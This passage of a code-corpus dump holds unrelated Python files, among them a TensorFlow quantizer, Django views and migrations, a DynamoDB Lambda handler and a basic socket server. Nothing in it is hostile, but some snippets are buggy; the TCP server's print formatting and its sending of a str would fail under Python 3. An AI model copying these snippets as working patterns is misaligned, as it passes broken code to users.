str(index))\n weight_tensor_scale = [input_tensor, weight_scales]\n matmul_op._update_input(index, new_weight_tensor)\n self._save_quant_tensor_consumer_info(new_weight_tensor, index, matmul_op)\n self._save_original_tensor_consumer_info(input_tensor, index, matmul_op)\n debug_print(\"weight quant updated\")\n else:\n debug_print(input_tensor.name, \"is input tensor\")\n if _MNN_compress_scope not in input_tensor.name:\n new_op_input, input_scale, dims, init_moving_scale_op = self._fake_quant_feature(input_tensor, scope + '_input_' + str(index), matmul_op, 'input')\n input_scale_and_dim.append(input_tensor)\n input_scale_and_dim.append(input_scale)\n input_scale_and_dim.append(dims)\n matmul_op._update_input(index, new_op_input)\n self._save_quant_tensor_consumer_info(new_op_input, index, matmul_op)\n self._save_original_tensor_consumer_info(input_tensor, index, matmul_op)\n debug_print(\"feature quant updated\")\n else:\n pre_output_scope = self._get_quant_scope(input_tensor.name, '_output')\n pre_output_scale_name = pre_output_scope + '/moving_average_scale'\n pre_output_scale = get_variable_by_name(pre_output_scale_name)\n input_scale = pre_output_scale\n init_moving_scale_op = self._feature_scale_init_op[pre_output_scale]\n assert pre_output_scale in self._feature_scale_original_tensor_dims_map.keys()\n input_scale_and_dim.append(self._feature_scale_original_tensor_dims_map[pre_output_scale][0])\n input_scale_and_dim.append(pre_output_scale)\n input_scale_and_dim.append(self._feature_scale_original_tensor_dims_map[pre_output_scale][1])\n\n debug_print(\"pre_output_scale:\", pre_output_scale, pre_output_scale.name)\n debug_print(pre_output_scale in self._feature_scale_original_tensor_dims_map)\n debug_print(self._feature_scale_original_tensor_dims_map[pre_output_scale])\n debug_print(input_tensor.name, \"feature already quant\")\n\n bias_add_op = find_bias_add_op(matmul_op)\n if bias_add_op is not None:\n for index in 
range(len(bias_add_op.inputs)):\n input_tensor = bias_add_op.inputs[index]\n if is_weight_tensor(input_tensor):\n debug_print(\"found bias:\", input_tensor.name, \"index:\", index)\n new_bias = self._fake_quant_bias(input_tensor, input_scale, weight_scales, scope + '_bias_' + str(index), init_moving_scale_op)\n bias_add_op._update_input(index, new_bias)\n self._save_quant_tensor_consumer_info(new_bias, index, bias_add_op)\n self._save_original_tensor_consumer_info(input_tensor, index, bias_add_op)\n\n output_tensor = find_quant_output_tensor(matmul_op)\n output_consumers = output_tensor.consumers()\n # if _MNN_compress_scope not in output_consumers[0].name:\n new_output_tensor, output_scale, dims, init_moving_scale_op = self._fake_quant_feature(output_tensor, scope + '_output', matmul_op, 'output')\n output_scale_and_dim.append(output_tensor)\n output_scale_and_dim.append(output_scale)\n output_scale_and_dim.append(dims)\n for c in output_consumers:\n index = get_input_tensor_index(c, output_tensor)\n for id in index:\n c._update_input(id, new_output_tensor)\n self._save_quant_tensor_consumer_info(new_output_tensor, id, c)\n self._save_original_tensor_consumer_info(output_tensor, id, c)\n\n input_scale_and_dim.append(tf.constant(self._clamp_value))\n output_scale_and_dim.append(tf.constant(self._clamp_value))\n\n bn_stat = get_batch_norm_statistics(matmul_op)\n\n return {\"weight_info\": weight_tensor_scale, \"input_info\": input_scale_and_dim, \"output_info\": output_scale_and_dim, \"bn_stat\": bn_stat}\n\n def _fake_quant_bias(self, bias_tensor, input_scale, weight_scales, scope, init_moving_scale_op):\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n with self._graph.gradient_override_map({'Round': 'Identity'}):\n with tf.control_dependencies([init_moving_scale_op]):\n weight_scales_reshape = tf.reshape(weight_scales, bias_tensor.shape)\n bias_scale = input_scale * weight_scales_reshape\n bias_scale = bias_scale + tf.cast(tf.less(tf.abs(bias_scale), 1e-6), tf.float32) * self._eps\n before_round = tf.divide(bias_tensor, bias_scale, name=_MNN_mark_start_name)\n before_round = before_round + 1e-3 * tf.sign(before_round)\n quant_bias = tf.round(before_round)\n new_bias = quant_bias * bias_scale\n new_bias_tensor = tf.cond(tf.constant(True), lambda: new_bias, lambda: bias_tensor, name=_MNN_mark_end_name)\n \n return new_bias_tensor\n\n def _fake_quant_weight(self, weight_tensor, reduce_dims, scope, clamp_value=None):\n if clamp_value is None:\n clamp_value = self._clamp_value\n\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n with self._graph.gradient_override_map({'Round': 'Identity'}):\n scales = tf.reduce_max(tf.abs(weight_tensor, name=_MNN_mark_start_name), axis=reduce_dims, keep_dims=True) / clamp_value + self._eps\n weight_scales = tf.get_variable(name='weight_scales', initializer=tf.zeros_like(scales), trainable=False)\n tf.add_to_collection(_MNN_variable_collection_name, weight_scales)\n scales_assign = tf.assign(weight_scales, scales)\n with tf.control_dependencies([scales_assign]):\n quant_w = tf.clip_by_value(tf.round(weight_tensor / scales), -clamp_value, clamp_value)\n fake_quant_w = quant_w * scales\n\n if _MNN_QAT_DEBUG:\n print_op = tf.print(scope, \"weight clamp value:\", clamp_value)\n with tf.control_dependencies([print_op]):\n new_weight_tensor = tf.cond(tf.constant(True), lambda: fake_quant_w, lambda: weight_tensor, name=_MNN_mark_end_name)\n else:\n new_weight_tensor = tf.cond(tf.constant(True), lambda: fake_quant_w, lambda: weight_tensor, 
name=_MNN_mark_end_name)\n\n self._weight_scale_original_tensor_map[weight_scales] = weight_tensor\n\n return new_weight_tensor, weight_scales\n\n def _fake_quant_feature(self, feature, scope, op, type, clamp_value=None):\n if clamp_value is None:\n clamp_value = self._clamp_value\n \n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n with self._graph.gradient_override_map({'Round': 'Identity'}):\n feature_abs_max = tf.reduce_max(tf.abs(feature, name=_MNN_mark_start_name))\n if _MNN_QAT_DEBUG:\n print_op = tf.print(\"op:\", op.name, type, \"feature_abs_max, clamp_value:\", feature_abs_max, clamp_value)\n with tf.control_dependencies([print_op]):\n instance_scale = feature_abs_max / clamp_value\n else:\n instance_scale = feature_abs_max / clamp_value\n moving_average_scale = tf.get_variable(name='moving_average_scale', initializer=0., trainable=False)\n tf.add_to_collection(_MNN_variable_collection_name, moving_average_scale)\n\n def init():\n init_assign = tf.assign(moving_average_scale, instance_scale)\n initialize_op = tf.assign(self._op_scale_initialized[op][type], 1)\n if _MNN_QAT_DEBUG:\n print_op = tf.print(\"init\", moving_average_scale.name, init_assign)\n with tf.control_dependencies([print_op, initialize_op]):\n return tf.identity(init_assign)\n else:\n with tf.control_dependencies([initialize_op]):\n return tf.identity(init_assign)\n\n def do_nothing():\n return moving_average_scale\n\n init_moving_scale = tf.cond(tf.equal(self._op_scale_initialized[op][type], 0), init, do_nothing)\n self._feature_scale_init_op[moving_average_scale] = init_moving_scale\n\n def fake_quant():\n def moving_average_scale_update():\n if _MNN_QAT_DEBUG:\n with tf.control_dependencies([init_moving_scale]):\n assign_scale = tf.assign(moving_average_scale, moving_average_scale * self._momentum + instance_scale * (1 - self._momentum))\n with tf.control_dependencies([assign_scale]):\n print_op = tf.print(\"train:\", scope + \"_scale:\", instance_scale, moving_average_scale)\n with tf.control_dependencies([assign_scale, print_op]):\n return tf.identity(instance_scale)\n else:\n with tf.control_dependencies([init_moving_scale]):\n assign_scale = tf.assign(moving_average_scale, moving_average_scale * self._momentum + instance_scale * (1 - self._momentum))\n with tf.control_dependencies([assign_scale]):\n return tf.identity(instance_scale)\n\n def return_average_scale():\n if _MNN_QAT_DEBUG:\n print_op = tf.print(\"test:\", moving_average_scale.name, moving_average_scale)\n with tf.control_dependencies([print_op]):\n return tf.identity(moving_average_scale)\n else:\n return tf.identity(moving_average_scale)\n\n scale = tf.cond(self._is_training, moving_average_scale_update, return_average_scale)\n quant_x = tf.clip_by_value(tf.round(feature / scale), -clamp_value, clamp_value)\n fake_quant_x = quant_x * scale\n \n return fake_quant_x\n\n new_feature = tf.cond(tf.constant(True), fake_quant, lambda:feature, name=_MNN_mark_end_name)\n \n self._feature_scale_original_tensor_dims_map[moving_average_scale] = [feature, feature.shape.as_list()[-1]]\n \n return new_feature, moving_average_scale, feature.shape.as_list()[-1], init_moving_scale\n","sub_path":"tools/mnncompress/mnncompress/tensorflow/EMA_quantizer.py","file_name":"EMA_quantizer.py","file_ext":"py","file_size_in_byte":35947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600903685","text":"import numpy as np\nimport glob\nimport os\n\n\nbilou = 'BILOU'\n\n\n# class Token:\n# # tag = 'O'\n# id = 
0\n# tag = bilou.find('O')\n# cls = '_'\n# content = ''\n# position = 0\n#\n# def __str__(self):\n# return '<' + str(self.id) + ' ' + self.tag + ' ' + self.cls + ' ' + self.content + ' position:' + str(self.position) + '>'\n\n\nclass Span:\n tokens = []\n cls = '_'\n tag = 'O'\n\n def __str__(self):\n return '<' + str(self.id) + ' ' + self.cls + ' ' + str(self.tokens) + ' ' + self.tag + '>'\n\n\nclass Object:\n spans = []\n\n def __str__(self):\n return '<' + str(self.id) + ' ' + self.cls + ' ' + str(self.spans) + '>'\n\n\ndef read_tokens(file):\n sentence = []\n tokens = []\n file = open(file + '.tokens', 'r')\n for token in file:\n # print(token.strip())\n if token.strip() != '':\n params = token.strip().split(\" \")\n # t = Token()\n # t.id = int(params[0])\n # t.content = params[3]\n t = {\n 'cls': '_',\n 'tag': bilou.find('O'),\n 'id': int(params[0]),\n 'content': params[3],\n 'position': 0\n }\n tokens.append(t)\n\n else:\n sentence.append(tokens)\n tokens = []\n return sentence\n\n\ndef read_spans(file):\n spans = []\n file = open(file + '.spans', 'r')\n for span in file:\n params = span.strip().split(\" \")\n spn = Span()\n spn.id = int(params[0])\n spn.tokens = []\n count = int(params[5])\n for i in range(0, count):\n spn.tokens.append(int(params[8 + i]))\n spans.append(spn)\n return spans\n\n\ndef read_objects(file):\n objects = []\n file = open(file + '.objects', 'r')\n for obj in file:\n params = obj.strip().split(\" \")\n object = Object()\n object.id = int(params[0])\n object.cls = params[1]\n object.spans = []\n i = 2\n while params[i] != '#':\n object.spans.append(int(params[i]))\n i += 1\n objects.append(object)\n return objects\n\n\ndef set_params_on_spans(span, objs):\n for obj in objs:\n if span.id in obj.spans:\n span.cls = obj.cls\n if len(obj.spans) == 1:\n span.tag = 'U'\n elif len(obj.spans) > 1:\n if obj.spans[0] == span.id:\n span.tag = 'B'\n elif obj.spans[-1] == span.id:\n span.tag = 'L'\n else:\n span.tag = 'I'\n\n\ndef set_params_on_tokens(token, spans):\n tag = 'O'\n for span in spans:\n if token['id'] in span.tokens and span.cls != '_' and token['tag'] == bilou.find('O'):\n token['cls'] = span.cls\n if span.tag == 'B':\n if token['id'] == span.tokens[0]:\n tag = 'B'\n else:\n tag = 'I'\n elif span.tag == 'I':\n tag = 'I'\n elif span.tag == 'L':\n if token['id'] == span.tokens[-1]:\n tag = 'L'\n else:\n tag = 'I'\n elif span.tag == 'U':\n if len(span.tokens) > 1:\n if token['id'] == span.tokens[0]:\n tag = 'B'\n elif token['id'] == span.tokens[-1]:\n tag = 'L'\n else:\n tag = 'I'\n elif len(span.tokens) == 1:\n tag = 'U'\n token['tag'] = bilou.find(tag)\n # token.tag = tag\n\n\ndef convert_test_dataset(files):\n text = []\n sent_vector = []\n # os.chdir(dir)\n # files = os.listdir()\n dict_files = list(map(lambda t: os.path.splitext(t)[0], (list(filter(lambda x: x.endswith('.txt'), files)))))\n # print(len(dict_files))\n for name in dict_files:\n sentences = read_tokens(name)\n spans = read_spans(name)\n objects = read_objects(name)\n for spn in spans:\n set_params_on_spans(spn, objects)\n # print(len(sentences))\n\n for sent in sentences:\n for index, tkn in enumerate(sent):\n set_params_on_tokens(tkn, spans)\n tkn['position'] = index\n text.append(sent)\n return text\n\n","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"102925896","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom 
django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('flatpages', '0002_auto_20150923_1801'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='acting',\n options={'ordering': ('order',), 'get_latest_by': 'created_at', 'verbose_name': 'Atua\\xe7\\xe3o', 'verbose_name_plural': 'Atua\\xe7\\xf5es'},\n ),\n migrations.AlterModelOptions(\n name='institutional',\n options={'ordering': ('order',), 'get_latest_by': 'created_at', 'verbose_name': 'Institucional', 'verbose_name_plural': 'Institucionais'},\n ),\n migrations.AddField(\n model_name='acting',\n name='order',\n field=models.PositiveIntegerField(default=0),\n ),\n migrations.AddField(\n model_name='institutional',\n name='order',\n field=models.PositiveIntegerField(default=0),\n ),\n ]\n","sub_path":"apps/flatpages/migrations/0003_auto_20151015_2016.py","file_name":"0003_auto_20151015_2016.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"560275185","text":"from sklearn import svm\nimport numpy as np\nfrom sklearn import datasets\nimport matplotlib.pylab as plt\n\nboston = datasets.load_boston()\nX_train = boston.data[0:30]\n# print(X_train)\n\ny_train = boston.target[0:30]\n# print( y_train)\n\ny_train_binary = []\n\nfor price in y_train:\n y_train_binary.append(price >= 20)\n\n# plt.plot(X_train, y_train_binary)\n# plt.show()\n\nX_test = boston.data[28]\ny_test = boston.target[28]\n\nprint(y_test)\n\nclf = svm.SVC()\nclf.fit(X_train, y_train_binary)\n\nprint(clf.predict([X_test]))\n\n# # get support vectors\n# print(clf.support_vectors_)\n#\n#\n# # get indices of support vectors\n# print(clf.support_)\n#\n# # get number of support vectors for each class\nprint(clf.n_support_)\n","sub_path":"svm_linear.py","file_name":"svm_linear.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"334912010","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Magnet',\n fields=[\n ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),\n ('description', models.TextField()),\n ('image_url', models.URLField()),\n ('content', models.TextField()),\n ('status', models.CharField(max_length=8, default='Normal')),\n ('created_datetime', models.DateTimeField(auto_now_add=True)),\n ('updated_datetime', models.DateTimeField(auto_now=True)),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['-created_datetime'],\n 'get_latest_by': 'created_datetime',\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"magnet/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"147250910","text":"import json\nimport boto3\nfrom datetime import date\ndynamodb = boto3.resource('dynamodb')\ntable = dynamodb.Table('ismaeelDB')\n\n################################### Methods ########################################\n########### Methhod (1)to Check is the given regno is already exist or not ###############\ndef 
check_if_item_exist(item):\n response = table.get_item(\n Key={\n 'regno': item\n }\n )\n return True if ('Item' in response) else False\n \n \n############################################## Method to check the validation of input ################\ndef validatesInput(firstname,lastname,section,errors,resp):\n \n if (firstname==None or not firstname):\n resp[\"message\"]='Requested Inputs are not completes' \n errors.append(\"errormessage : firstname not valid/Firstname is empty\")\n\n \n if (lastname==None or not lastname):\n resp[\"message\"]='Requested Inputs are not completes' \n errors.append(\"errormessage :lastname not valid/lastname is empty\")\n \n if (section!=None and not section):\n resp[\"message\"]='Requested Inputs are not completes' \n errors.append(\"errormessage : sectoin not valid/sectoin is empty\")\n return True if (not errors ) else False \n\n################################################ main lambda function ##########################################\ndef lambda_handler(event, context):\n errors=[]\n resp={\n \"success\":False ,\n \"StatusCode\":400 ,\n \"message\":\"\"\n }\n if not event:\n resp[\"message\"]=' invalid input request'\n errors.append( 'errormessage : No events Found ') \n elif not event.get('regno'):\n resp[\"message\"]=' invalid input request'\n errors.append( 'errormessage : No registration events Found ') \n else: \n IndexOfRegno=list(event.keys()).index(\"regno\")\n event.update({list(event.keys())[IndexOfRegno]:list(event.values())[IndexOfRegno].upper()})\n regno = event.get('regno', None)\n firstname = event.get('firstname', None)\n lastname = event.get('lastname', None)\n section = event.get('section', None)\n \n # if (regno==None or not regno) :\n # resp[\"message\"]=' Registration Number is Primary Key must be Entered First'\n # errors.append( 'errormessage : Invalid registration number ')\n # errors.append( 'errormessage : Registration Number is not Entered ')\n \n if(check_if_item_exist(str(regno.upper())) ):\n # if (check_if_item_exist(str(regno.lower())) )\n resp[\"message\"]='Duplication of data may occur try with another registration number '\n errors.append('errormessage : Data is already uploaded for ' + regno)\n \n \n \n \n elif(validatesInput(firstname,lastname,section,errors,resp)):\n response = table.put_item(Item=event)\n resp[\"success\"]=True\n resp[\"StatusCode\"]=200\n resp[\"message\"]='Date stored Successfully ' \n # resp[\"errors\"]=None\n \n \n \n \n \n \n if not errors:\n resp[\"errors\"]=None\n else:\n resp[\"errors\"]=errors\n return resp ","sub_path":"lambda_apigateway_dynamoDBC1/modules/lambdas/lambda_functions/ismaeelCreatedFunctionp.py","file_name":"ismaeelCreatedFunctionp.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"282605712","text":"def getpicname(cropname):\r\n ip = cropname.split('_')[0]\r\n day = cropname.split('_')[1]\r\n return ip + '_' +day + '.jpg'\r\n\r\n\r\n\r\ndef getalertcount(txtpath, detthresh, classthresh, labels):\r\n repeat = []\r\n with open(txtpath, 'r') as f:\r\n lines = f.readlines()\r\n total = len(lines)\r\n count = 0\r\n for line in lines:\r\n line = line.strip()\r\n factors = line.split(',')\r\n name = factors[0]\r\n detscore = float(name.split('_')[-1][:-4])\r\n classscore = float(factors[-2])\r\n label = int(factors[-1])\r\n if label in labels:\r\n if detscore > detthresh:\r\n if classscore > classthresh:\r\n picname = getpicname(name)\r\n if picname not in repeat:\r\n 
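# count each source image at most once, however many of its crops pass the thresholds\n 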
repeat.append(picname)\r\n count += 1\r\n return count, count/total, len(repeat), len(repeat)/11666\r\n\r\n\r\nif __name__ == '__main__':\r\n txtpath = '/defaultShare/share/wujl/83/online_data/2020-07-30_20_19.txt'\r\n labelboxes = [[2,3,5,6,7,10,14]]\r\n detthreshs = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\r\n classthreshs = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\r\n for labels in labelboxes:\r\n for detthresh in detthreshs:\r\n for classthresh in classthreshs:\r\n count, rate, piccount, picrate = getalertcount(txtpath, detthresh, classthresh, labels)\r\n print('{}'.format(labels))\r\n print('det{}_c{} is : {}, {}, {}, {}'.format(detthresh, classthresh, count, rate, piccount, picrate))\r\n print('*'*10)\r\n\r\n","sub_path":"test/staticalert.py","file_name":"staticalert.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"221929982","text":"# coding=utf-8\nimport pymongo\nfrom configure.ConfigureUtils import *\nimport configure.constans as ct\n\n\nclass MongoUtils(object):\n\n def __init__(self):\n configure_utils = get_configure_utils()\n mongo_host = configure_utils.get(ct.new_mongo_host)\n mongo_port = configure_utils.getint(ct.new_mongo_port)\n self.new_mongodb = pymongo.MongoClient(mongo_host, mongo_port)\n mongo_db_str = configure_utils.get(ct.mongo_db)\n self.db = self.new_mongodb[mongo_db_str]\n self.hx_moment_sources = self.db.hx_moment_sources\n self.hx_moment_spider_filter = self.db.hx_moment_spider_filter\n self.hx_moment_notype = self.db.hx_moment_notype\n self.hx_moment_record = self.db.hx_moment_record\n\n\nif __name__ == '__main__':\n configure_utils = init_configure_utils(\"test\")\n mongo_utils = MongoUtils()\n one = mongo_utils.hx_moment_notype.find_one({'_id': \"ef76c5b22104798ea70c9198f935871b\"})\n print(one)\n","sub_path":"predict_user_attribute/old/gender/utils/mongo/MongoUtils.py","file_name":"MongoUtils.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"627340674","text":"\"\"\"\nService class\n------------------\nService object for interfacing with the Pipelines service API\n\n\"\"\"\n\nimport logging\n\nfrom ...client import Client\nfrom ...services import BaseService\n\nRUNNING_STATUSES = [\"QUEUED\", \"LAUNCHING\", \"INITIALIZING\", \"RUNNING\"]\nFAILED_STATUSES = [\"FAILED\", \"TERMINATED\"]\nFINISHED_STATUSES = [\"FINISHED\", \"CANCELLED\"]\nALL_STATUSES = RUNNING_STATUSES + FAILED_STATUSES + FINISHED_STATUSES + [\"ALL\"]\n\nSERVICE_PATH = \"pipelines-service\"\n\nlog = logging.getLogger(__file__)\n\n\nclass Service(BaseService):\n def __init__(self, client: Client, *args, **kwargs) -> None:\n super(Service, self).__init__(client, SERVICE_PATH, *args, **kwargs)\n","sub_path":"nextcode/services/pipelines/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"241498311","text":"class CmdSetStats(default_cmds.MuxCommand):\n \"\"\"\n \n \"\"\"\n \n key = \"setstats\"\n locks = \"cmd:all()\"\n \n def func(self):\n caller = self.caller\n rolls = 25\n msg1 = \"Runaria uses a method of rolling the dice to create player attributes. These attributes are: strength, dexterity, constitution, intelligence, wisdom, and charisma. 
Choose the order of your attributes from the most important to your character to the least important.\\n\\nAn example is as follows: strength dexterity constitution intelligence wisdom charisma\\n\\nYou will only be able to roll 25 times, so when you see a decent roll you should accept it.\"\n if self.caller.db.stat_rolled: \n return self.caller.msg('You may only roll your stats once.')\n elif not self.caller.db.stat_rolled:\n self.caller.msg(msg1)\n statorder = input('Enter your attribute order:')\n stats_in_order = statorder.strip().split()","sub_path":"commands/setstats.py","file_name":"setstats.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"324787593","text":"# Configuration file to make YouCompleteMe (http://valloric.github.io/YouCompleteMe/)\n# for Vim behave for development on the `selene` library. Use at your own risk.\n# Modeled after https://github.com/Valloric/ycmd/blob/master/cpp/ycm/.ycm_extra_conf.py.\n\nimport os\nimport ycm_core\n\n\nHEADER_EXTENSIONS = ['.h', '.hpp']\nSOURCE_EXTENSIONS = ['.c', '.cpp']\nBUILD_DIRECTORY = \"build\" # Change if build happens in another directory\n\n# These are the compilation flags that will be used in case there is no compilation database set\ndefault_flags = [\n '-x', 'c++',\n '-std=c++14',\n '-Wall', '-Wextra', '-Werror',\n '-fexceptions',\n '-I', '/usr/include',\n '-I', '/usr/local/include',\n '-I', os.path.expanduser('~') + '/homebrew/include/',\n '-I', os.path.expanduser('~') + '/homebrew/opt/jpeg-turbo/include',\n '-I', './src',\n '-I', './external/Catch2/single_include',\n '-D', 'SELENE_WITH_LIBJPEG',\n '-D', 'SELENE_WITH_LIBPNG',\n '-D', 'SELENE_WITH_OPENCV',\n]\n\n\ndef directory_of_this_script():\n return os.path.dirname(os.path.abspath(__file__))\n\n\n# Set this to the absolute path to the folder (NOT the file!) containing the\n# compile_commands.json file to use that instead of 'flags'. See here for more\n# details: http://clang.llvm.org/docs/JSONCompilationDatabase.html\ncompilation_database_folder = os.path.join(directory_of_this_script(), BUILD_DIRECTORY)\ncompilation_database_path = os.path.join(compilation_database_folder, \"compile_commands.json\")\n\nif os.path.exists(compilation_database_path):\n database = ycm_core.CompilationDatabase(compilation_database_folder)\nelse:\n database = None\n\n\ndef make_flags_paths_absolute(flags, working_directory):\n if not working_directory:\n return list(flags)\n\n new_flags = []\n make_next_absolute = False\n path_flags = ['-isystem', '-I', '-iquote', '--sysroot=']\n for flag in flags:\n new_flag = flag\n\n if make_next_absolute:\n make_next_absolute = False\n if not flag.startswith('/'):\n new_flag = os.path.join(working_directory, flag)\n\n for path_flag in path_flags:\n if flag == path_flag:\n make_next_absolute = True\n break\n\n if flag.startswith(path_flag):\n path = flag[len(path_flag):]\n new_flag = path_flag + os.path.join(working_directory, path)\n break\n\n new_flags.append(new_flag)\n return new_flags\n\n\ndef is_header_file(filename):\n extension = os.path.splitext(filename)[1]\n return extension in HEADER_EXTENSIONS\n\n\ndef get_compilation_info_for_file(filename):\n # The compilation_commands.json file generated by CMake does not have\n # entries for header files. So we do our best by asking the db for flags\n # for a corresponding source file, if any. 
If one exists, the flags for\n # that file should be good enough.\n if is_header_file(filename):\n basename = os.path.splitext(filename)[0]\n for extension in SOURCE_EXTENSIONS:\n replacement_file = basename + extension\n if os.path.exists(replacement_file):\n compilation_info = database.GetCompilationInfoForFile(replacement_file)\n return compilation_info\n return None\n return database.GetCompilationInfoForFile(filename)\n\n\ndef FlagsForFile(filename, **kwargs):\n if database:\n # Bear in mind that compilation_info.compiler_flags_ does NOT return\n # a python list, but a \"list-like\" StringVec object\n compilation_info = get_compilation_info_for_file(filename)\n if compilation_info:\n flags = make_flags_paths_absolute(compilation_info.compiler_flags_,\n compilation_info.compiler_working_dir_)\n return {'flags': flags}\n\n relative_to = directory_of_this_script()\n flags = make_flags_paths_absolute(default_flags, relative_to)\n return {'flags': flags}\n","sub_path":".ycm_extra_conf.py","file_name":".ycm_extra_conf.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"335213915","text":"from sys import stdin\nfrom collections import deque\nn = int(input())\nd = [-1] * (n + 1)\ndef bfs():\n d[1] = 0\n dq = deque([1])\n while len(dq) != 0:\n v = dq.popleft()\n for c in G[v]:\n if d[c] != -1 : continue\n d[c] = d[v] + 1\n dq.append(c)\n for i, x in enumerate(d[1:], start=1):\n print(i, x)\nG = [0] + [list(map(int, input().split()[2:])) for i in range(n)]\nbfs()","sub_path":"Python_codes/p02239/s215469299.py","file_name":"s215469299.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"95390558","text":"#!/usr/bin/python3\r\n\r\nimport socket\r\n\r\n#Creating the socket object\r\nserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\nhost = socket.gethostname() # Host is server IP\r\nport = 444 # The TCP port number this server is bound to\r\n\r\n#Binding to socket\r\nserversocket.bind((host, port)) #Host will be replaced/substitued with IP, if changed and not running on host\r\n\r\n#listen for incoming connection\r\nserversocket.listen(3)\r\n\r\n#Infinite loop, each iteration handles a connection from a client\r\nwhile True:\r\n #Accept the connection \r\n clientsocket,address = serversocket.accept()\r\n\r\n print(\"received connection from \" % str(address))\r\n \r\n #Message sent to client after successful connection\r\n message = 'hello! 
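The p02239 snippet above reads adjacency lists from stdin in a judge-specific format; the traversal itself is ordinary breadth-first search. The same algorithm on a plain dict graph, self-contained:

```python
from collections import deque

def bfs_distances(graph, source):
    """Breadth-first distances from source; unreachable nodes stay at -1."""
    dist = {v: -1 for v in graph}
    dist[source] = 0
    dq = deque([source])
    while dq:
        v = dq.popleft()
        for nxt in graph[v]:
            if dist[nxt] == -1:
                dist[nxt] = dist[v] + 1
                dq.append(nxt)
    return dist

print(bfs_distances({1: [2, 4], 2: [4], 3: [], 4: [3]}, 1))
# distances: 1 -> 0, 2 -> 1, 4 -> 1, 3 -> 2
```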
Thank you for connecting to the server' + \"\\r\\n\"\r\n \r\n clientsocket.send(message)\r\n\r\n clientsocket.close()\r\n","sub_path":"TCP Server.py","file_name":"TCP Server.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"434585627","text":"from django.db.models.fields.json import DataContains\nfrom django.shortcuts import render, redirect\nfrom .models import Author, Book\nfrom .forms import *\n# Create your views here.\n\n\ndef books(request):\n books = Book.objects.order_by('title')\n data = {\"books\": books}\n return render(request, \"books/books.html\", data)\n\n\ndef authors(request):\n authors = Author.objects.order_by('first_name')\n data = {\"authors\": authors}\n return render(request, \"books/authors.html\", data)\n\n\ndef add_books(request):\n form = BooksForm()\n if request.method == 'POST':\n form = BooksForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/')\n\n data = {\"form\": form}\n return render(request, \"books/add_books.html\", data)\n\n\ndef add_authors(request):\n form = AuthorsForm()\n if request.method == 'POST':\n form = AuthorsForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/authors')\n\n data = {\"form\": form}\n return render(request, \"books/add_authors.html\", data)\n\n\ndef update_books(request, pk):\n book = Book.objects.get(id=pk)\n form = BooksForm(instance=book)\n\n if request.method == \"POST\":\n form = BooksForm(request.POST, instance=book)\n if form.is_valid():\n form.save()\n return redirect('/')\n\n data = {\"book\": book, \"form\": form}\n return render(request, 'books/update_books.html', data)\n\n\ndef update_authors(request, pk):\n author = Author.objects.get(id=pk)\n form = AuthorsForm(instance=author)\n\n if request.method == \"POST\":\n form = AuthorsForm(request.POST, instance=author)\n if form.is_valid():\n form.save()\n return redirect('/')\n\n data = {\"author\": author, \"form\": form}\n return render(request, 'books/update_authors.html', data)\n\n\ndef delete_books(request, pk):\n book = Book.objects.get(id=pk)\n book.delete()\n return redirect('/')\n\n\ndef delete_authors(request, pk):\n author = Author.objects.get(id=pk)\n author.delete()\n return redirect('/authors')\n","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"202549141","text":"##########################################################################\n# \n# Copyright (c) 2014, Image 